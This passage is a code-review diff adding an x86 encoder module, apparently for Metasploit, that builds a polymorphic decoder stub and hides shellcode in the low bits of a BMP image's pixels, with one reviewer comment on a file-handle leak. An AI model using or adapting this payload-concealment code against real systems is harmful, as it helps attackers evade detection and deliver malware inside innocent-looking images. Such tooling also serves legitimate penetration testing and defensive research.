modules/encoders/x86/bmp_polyglot.rb

```diff
@@ -0,0 +1,423 @@
+    jmp_bit_loop_body.depends_on(put_lsb, inc_src_reg)
+
+    jmp_bit_loop = Rex::Poly::LogicalBlock.new('jmp_bit_loop',
+      Proc.new { |b| (0x48 + b.regnum_of(ctr_reg)).chr + "\x75" + (0xfe + -12).chr }
+    )
+    jmp_bit_loop.depends_on(jmp_bit_loop_body)
+
+    get_bit_loop = Rex::Poly::LogicalBlock.new('get_bit_loop_body', jmp_bit_loop.generate([ Rex::Arch::X86::EBP, Rex::Arch::X86::ESP ]))
+    get_bit_loop.depends_on(get_byte_loop)
+
+    put_byte = Proc.new { |b| "\x88" + (0x00 + (b.regnum_of(byte_reg) << 3) + b.regnum_of(dst_addr_reg)).chr }
+    inc_dst_reg = Proc.new { |b| (0x40 + b.regnum_of(dst_addr_reg)).chr }
+    restore_byte_ctr = Proc.new { |b| (0x58 + b.regnum_of(ctr_reg)).chr }
+    get_byte_post = Rex::Poly::LogicalBlock.new('get_byte_post',
+      Proc.new { |b| put_byte.call(b) + inc_dst_reg.call(b) + restore_byte_ctr.call(b) },
+      Proc.new { |b| put_byte.call(b) + restore_byte_ctr.call(b) + inc_dst_reg.call(b) },
+      Proc.new { |b| restore_byte_ctr.call(b) + put_byte.call(b) + inc_dst_reg.call(b) },
+    )
+    get_byte_post.depends_on(get_bit_loop)
+
+    jmp_byte_loop_body = Rex::Poly::LogicalBlock.new('jmp_byte_loop_body',
+      Proc.new { |b| (0x48 + b.regnum_of(ctr_reg)).chr + "\x75" + (0xfe + -26).chr  }
+    )
+    jmp_byte_loop_body.depends_on(get_byte_post)
+
+    finalize = Rex::Poly::LogicalBlock.new('finalize', "\x61")
+    finalize.depends_on(jmp_byte_loop_body)
+
+    return finalize.generate([ Rex::Arch::X86::EBP, Rex::Arch::X86::ESP ])
+  end
+
+  def stegoify(shellcode, data, lsbs = 1)
+    clr_mask = ((0xff << lsbs) & 0xff)
+    set_mask = clr_mask ^ 0xff
+    iter_count = 8 / lsbs
+
+    shellcode.each_char.with_index do |sc_byte, index|
+      sc_byte = sc_byte.ord
+      0.upto(iter_count - 1) do |bit_pos|
+        data_pos = (index * (8 / lsbs)) + bit_pos
+        shift = 8 - (lsbs * (bit_pos + 1))
+
+        d_byte = data[data_pos].ord
+        d_byte &= clr_mask
+        d_byte |= ((sc_byte & (set_mask << shift)) >> shift)
+        data[data_pos] = d_byte.chr
+      end
+    end
+
+    data
+  end
+
+  def validate_dib_header(bmp)
+    dib_header = bmp.read(DIB_HEADER_SIZE)
+    size, _, _, _, bbp, compression, _, _, _, _, _ = dib_header.unpack('VVVvvVVVVVV')
+    raise EncodingError, 'Bad .bmp DIB header, must be 40-byte BITMAPINFOHEADER' if size != DIB_HEADER_SIZE
+    raise EncodingError, 'Bad .bmp DIB header, bits per pixel must be must be either 24 or 32' if bbp != 24 && bbp != 32
+    raise EncodingError, 'Bad .bmp DIB header, compression can not be used' if compression != 0
+    dib_header
+  end
+
+  def encode(buf, badchars = nil, state = nil, platform = nil)
+    in_bmp = File.open(datastore['BitmapFile'], 'rb')
+
+    header = in_bmp.read(BM_HEADER_SIZE)
+    header, original_size, _, _, original_offset = header.unpack('vVvvV')
+    raise EncodingError, 'Bad .bmp header, must be 0x424D (BM)' if header != 0x4d42
```

Comment:
Raising here will leave a dangling file descriptor. Better might be to read all the bytes and not store the `File` object, e.g:
```ruby
bmp = File.read(datastore['BitmapFile'])
header = bmp[0, BM_HEADER_SIZE]
...
image_data = bmp[BM_HEADER_SIZE..-1]
```